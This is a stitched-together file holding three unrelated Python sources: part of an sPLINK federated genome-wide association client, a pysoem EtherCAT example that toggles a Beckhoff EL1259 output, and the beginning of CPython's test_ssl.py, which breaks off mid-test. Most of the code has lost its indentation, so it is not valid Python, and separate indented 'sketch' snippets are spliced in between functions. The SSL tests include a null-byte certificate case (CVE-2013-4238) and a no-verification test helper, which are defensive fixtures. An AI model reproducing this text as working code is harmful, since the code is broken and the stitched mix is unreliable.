# ##### Helper functions
def get_x_matrix_y_vector(self, snp_index):
""" Create feature matrix and label vector """
try:
# get non-missing rows after considering SNP values
snp_indices_non_missing = self.snp_values[snp_index] != MissingValue.SNP
index_values_non_missing = np.logical_and(self.non_missing_index_values, snp_indices_non_missing)
# create feature matrix
snp_vector = self.snp_values[snp_index][index_values_non_missing].reshape(-1, 1).astype(np.int64)
if len(self.covariate_names) == 0:
x_matrix = np.concatenate((np.ones((len(snp_vector), 1)).astype(np.int64), snp_vector), axis=1)
else:
x_matrix = np.concatenate((np.ones((len(snp_vector), 1)).astype(np.int64),
snp_vector, self.covariate_matrix[index_values_non_missing, :]), axis=1)
# create label vector
y_vector = self.phenotype_values[index_values_non_missing].reshape(-1, 1)
if self.algorithm in (SplinkAlgorithm.LOGISTIC_REGRESSION, SplinkAlgorithm.CHI_SQUARE):
y_vector = y_vector.astype(np.uint8)
return x_matrix, y_vector
except Exception as x_y_exception:
self.log(f'{x_y_exception}')
self.set_operation_status_failed()
def compute_allele_count(self, snp_index, allele_name, trait):
""" Compute allele count for minor-case, minor-control, major-case, and major-control """
try:
x_matrix, phenotype_values = self.get_x_matrix_y_vector(snp_index)
snp_values = x_matrix[:, 1]
trait_indices = np.where(phenotype_values == trait)[0]
trait_snp_values = snp_values[trait_indices]
if allele_name == self.first_allele_names[snp_index]:
return int(2 * np.where(trait_snp_values == SnpValue.HOMOZYGOTE_00)[0].size +
np.where(trait_snp_values == SnpValue.HETEROZYGOTE)[0].size)
if allele_name == self.second_allele_names[snp_index]:
return int(2 * np.where(trait_snp_values == SnpValue.HOMOZYGOTE_11)[0].size +
np.where(trait_snp_values == SnpValue.HETEROZYGOTE)[0].size)
except Exception as allele_count_exception:
self.log(allele_count_exception)
self.set_operation_status_failed()
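# A minimal standalone sketch of the allele-count rule used above: each
# homozygote carries two copies of its allele and each heterozygote carries
# one copy of each, so count = 2 * n_homozygote + n_heterozygote. The encoded
# genotype values (0/1/2) below are illustrative assumptions.
import numpy as np

genotypes = np.array([0, 0, 1, 2, 1, 0])  # 0=hom first allele, 1=het, 2=hom second allele
first_allele_count = 2 * np.count_nonzero(genotypes == 0) + np.count_nonzero(genotypes == 1)
second_allele_count = 2 * np.count_nonzero(genotypes == 2) + np.count_nonzero(genotypes == 1)
assert first_allele_count + second_allele_count == 2 * len(genotypes)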
# ##### Project progress/status widget related functions
def get_project_step_text(self):
""" Customize the label shown for project step in the status widget """
if self.operation_status == ClientOperation.WAITING_FOR_START:
return '-'
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION and self.project_step == SplinkProjectStep.BETA_LOGISTIC:
return f'Beta ({self.current_beta_iteration}/{self.max_iterations})'
if self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION and self.project_step == SplinkProjectStep.BETA_LINEAR:
return 'Beta'
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION and self.project_step == SplinkProjectStep.STD_ERROR_LOGISTIC:
return 'STD-Error'
if self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION and self.project_step == SplinkProjectStep.STD_ERROR_LINEAR:
return 'STD-Error'
return self.project_step
def get_chunk_text(self):
""" Customize label shown for chunk in the status widget """
if self.total_chunks == -1:
return '-'
return f'{self.current_chunk}/{self.total_chunks}'
# ##### Local parameter value computation
def compute_local_parameters(self):
""" OVERRIDDEN: Compute the local parameters in each step of the sPLINK algorithms """
try:
super().pre_compute_local_parameters() # MUST be called BEFORE step functions
# sPLINK specific local parameter computation steps
if self.project_step == HyFedProjectStep.INIT:
self.init_step()
elif self.project_step == SplinkProjectStep.SNP_ID:
self.snp_id_step()
elif self.project_step == SplinkProjectStep.ALLELE_NAME:
self.allele_name_step()
elif self.project_step == SplinkProjectStep.SAMPLE_COUNT:
self.sample_count_step()
elif self.project_step == SplinkProjectStep.NON_MISSING_COUNT:
self.non_missing_count_step()
elif self.project_step == SplinkProjectStep.MINOR_ALLELE:
self.minor_allele_step()
elif self.project_step == SplinkProjectStep.CONTINGENCY_TABLE:
self.contingency_table_step()
elif self.project_step == SplinkProjectStep.BETA_LINEAR:
self.beta_linear_step()
elif self.project_step == SplinkProjectStep.BETA_LOGISTIC:
self.beta_logistic_step()
elif self.project_step == SplinkProjectStep.STD_ERROR_LINEAR:
self.std_error_linear_step()
elif self.project_step == SplinkProjectStep.STD_ERROR_LOGISTIC:
self.std_error_logistic_step()
elif self.project_step == HyFedProjectStep.RESULT:
super().result_step() # the result step downloads the result file as zip (it is algorithm-agnostic)
elif self.project_step == HyFedProjectStep.FINISHED:
super().finished_step() # the operations in the last step of the project are algorithm-agnostic
super().post_compute_local_parameters() # MUST be called AFTER step functions
except Exception as computation_exception:
self.log(computation_exception)
super().post_compute_local_parameters()
self.set_operation_status_failed()
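# A minimal standalone sketch of a dictionary-based alternative to the
# if/elif dispatch in compute_local_parameters above; the step names and
# handlers are illustrative stand-ins, not the HyFed/sPLINK API.
def _init_step():
    return 'init done'

def _result_step():
    return 'result done'

_STEP_HANDLERS = {
    'INIT': _init_step,
    'RESULT': _result_step,
}

def run_step(step_name):
    handler = _STEP_HANDLERS.get(step_name)
    if handler is None:
        raise ValueError(f'unknown project step: {step_name}')
    return handler()

assert run_step('INIT') == 'init done'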
|
basic_example.py | """Toggles the state of a digital output on an EL1259.
Usage: python basic_example.py <adapter>
This example expects a physical slave layout according to
_expected_slave_layout; see below.
"""
import sys
import struct
import time
import threading
from collections import namedtuple
import pysoem
class BasicExample:
BECKHOFF_VENDOR_ID = 0x0002
EK1100_PRODUCT_CODE = 0x044c2c52
EL3002_PRODUCT_CODE = 0x0bba3052
EL1259_PRODUCT_CODE = 0x04eb3052
def __init__(self, ifname):
self._ifname = ifname
self._pd_thread_stop_event = threading.Event()
self._ch_thread_stop_event = threading.Event()
self._actual_wkc = 0
self._master = pysoem.Master()
self._master.in_op = False
self._master.do_check_state = False
SlaveSet = namedtuple('SlaveSet', 'name product_code config_func')
self._expected_slave_layout = {0: SlaveSet('EK1100', self.EK1100_PRODUCT_CODE, None),
1: SlaveSet('EL3002', self.EL3002_PRODUCT_CODE, None),
2: SlaveSet('EL1259', self.EL1259_PRODUCT_CODE, self.el1259_setup)}
def el1259_setup(self, slave_pos):
slave = self._master.slaves[slave_pos]
slave.sdo_write(0x8001, 2, struct.pack('B', 1))
rx_map_obj = [0x1603,
0x1607,
0x160B,
0x160F,
0x1611,
0x1617,
0x161B,
0x161F,
0x1620,
0x1621,
0x1622,
0x1623,
0x1624,
0x1625,
0x1626,
0x1627]
rx_map_obj_bytes = struct.pack('Bx' + 'H' * len(rx_map_obj), len(rx_map_obj), *rx_map_obj)
slave.sdo_write(0x1c12, 0, rx_map_obj_bytes, True)
slave.dc_sync(1, 10000000)
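# A minimal standalone sketch of how the 0x1C12 assignment payload above is
# built: one unsigned byte with the entry count, one padding byte, then one
# 16-bit word per mapped PDO index. The two entries are illustrative values.
import struct

entries = [0x1603, 0x1607]
payload = struct.pack('Bx' + 'H' * len(entries), len(entries), *entries)
# on a little-endian host: b'\x02\x00\x03\x16\x07\x16'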
def _processdata_thread(self):
while not self._pd_thread_stop_event.is_set():
self._master.send_processdata()
self._actual_wkc = self._master.receive_processdata(10000)
if self._actual_wkc != self._master.expected_wkc:
print('incorrect wkc')
time.sleep(0.01)
def _pdo_update_loop(self):
self._master.in_op = True
output_len = len(self._master.slaves[2].output)
tmp = bytearray(output_len) # zero-initialized copy of the output image
toggle = True
try:
while True:
if toggle:
tmp[0] = 0x00
else:
tmp[0] = 0x02
self._master.slaves[2].output = bytes(tmp)
toggle = not toggle
time.sleep(1)
except KeyboardInterrupt:
# ctrl-C abort handling
print('stopped')
def run(self):
self._master.open(self._ifname)
if self._master.config_init() <= 0:
self._master.close()
raise BasicExampleError('no slave found')
for i, slave in enumerate(self._master.slaves):
if not ((slave.man == self.BECKHOFF_VENDOR_ID) and
(slave.id == self._expected_slave_layout[i].product_code)):
self._master.close()
raise BasicExampleError('unexpected slave layout')
slave.config_func = self._expected_slave_layout[i].config_func
slave.is_lost = False
self._master.config_map()
if self._master.state_check(pysoem.SAFEOP_STATE, 50000) != pysoem.SAFEOP_STATE:
self._master.close()
raise BasicExampleError('not all slaves reached SAFEOP state')
self._master.state = pysoem.OP_STATE
check_thread = threading.Thread(target=self._check_thread)
check_thread.start()
proc_thread = threading.Thread(target=self._processdata_thread)
proc_thread.start()
self._master.write_state()
all_slaves_reached_op_state = False
for i in range(40):
self._master.state_check(pysoem.OP_STATE, 50000)
if self._master.state == pysoem.OP_STATE:
all_slaves_reached_op_state = True
break
if all_slaves_reached_op_state:
self._pdo_update_loop()
self._pd_thread_stop_event.set()
self._ch_thread_stop_event.set()
proc_thread.join()
check_thread.join()
self._master.state = pysoem.INIT_STATE
# request INIT state for all slaves
self._master.write_state()
self._master.close()
if not all_slaves_reached_op_state:
raise BasicExampleError('not all slaves reached OP state')
@staticmethod
def _check_slave(slave, pos):
if slave.state == (pysoem.SAFEOP_STATE + pysoem.STATE_ERROR):
print(
'ERROR : slave {} is in SAFE_OP + ERROR, attempting ack.'.format(pos))
slave.state = pysoem.SAFEOP_STATE + pysoem.STATE_ACK
slave.write_state()
elif slave.state == pysoem.SAFEOP_STATE:
print(
'WARNING : slave {} is in SAFE_OP, try change to OPERATIONAL.'.format(pos))
slave.state = pysoem.OP_STATE
slave.write_state()
elif slave.state > pysoem.NONE_STATE:
if slave.reconfig():
slave.is_lost = False
print('MESSAGE : slave {} reconfigured'.format(pos))
elif not slave.is_lost:
slave.state_check(pysoem.OP_STATE)
if slave.state == pysoem.NONE_STATE:
slave.is_lost = True
print('ERROR : slave {} lost'.format(pos))
if slave.is_lost:
if slave.state == pysoem.NONE_STATE:
if slave.recover():
slave.is_lost = False
print(
'MESSAGE : slave {} recovered'.format(pos))
else:
slave.is_lost = False
print('MESSAGE : slave {} found'.format(pos))
def _check_thread(self):
while not self._ch_thread_stop_event.is_set():
if self._master.in_op and ((self._actual_wkc < self._master.expected_wkc) or self._master.do_check_state):
self._master.do_check_state = False
self._master.read_state()
for i, slave in enumerate(self._master.slaves):
if slave.state != pysoem.OP_STATE:
self._master.do_check_state = True
BasicExample._check_slave(slave, i)
if not self._master.do_check_state:
print('OK : all slaves resumed OPERATIONAL.')
time.sleep(0.01)
class BasicExampleError(Exception):
def __init__(self, message):
super().__init__(message)
self.message = message
if __name__ == '__main__':
print('basic_example started')
if len(sys.argv) > 1:
try:
BasicExample(sys.argv[1]).run()
except BasicExampleError as expt:
print('basic_example failed: ' + expt.message)
sys.exit(1)
else:
print('usage: basic_example ifname')
sys.exit(1)
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
WRONG_CERT = data_file("wrongcert.pem")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Jan 17 19:09:06 2028 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': 'F9BA076D5B6ABD9B',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 28 19:09:06 2027 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': '82EDBF41C880919C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
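# A minimal standalone demonstration of the leading-space normalization in
# asn1time above: strftime's %d emits a zero-padded day while OpenSSL's
# ASN1_TIME_print() uses a leading space for single-digit days.
formatted = "Jan 05 09:34:43 2018 GMT"
if formatted[4] == "0":
    formatted = formatted[:4] + " " + formatted[5:]
assert formatted == "Jan  5 09:34:43 2018 GMT"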
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
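# A minimal usage sketch for the test_wrap_socket helper above: wrap an
# unconnected TCP socket with the default (no-verification) settings. No
# handshake happens here; only context construction and wrapping are exercised.
def _test_wrap_socket_usage_sketch():
    plain = socket.socket(socket.AF_INET)
    with test_wrap_socket(plain) as wrapped:
        return wrapped.gettimeout()  # attribute access works before connecting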
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
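# A minimal usage sketch for testing_context above: the returned client
# context verifies against SIGNING_CA and the server context holds the signed
# certificate, so a loopback handshake against `hostname` would validate.
def _testing_context_usage_sketch():
    client_ctx, server_ctx, hostname = testing_context()
    assert client_ctx.verify_mode == ssl.CERT_REQUIRED  # PROTOCOL_TLS_CLIENT default
    return hostname  # 'localhost' for the default SIGNED_CERTFILE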
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL; the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in the left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
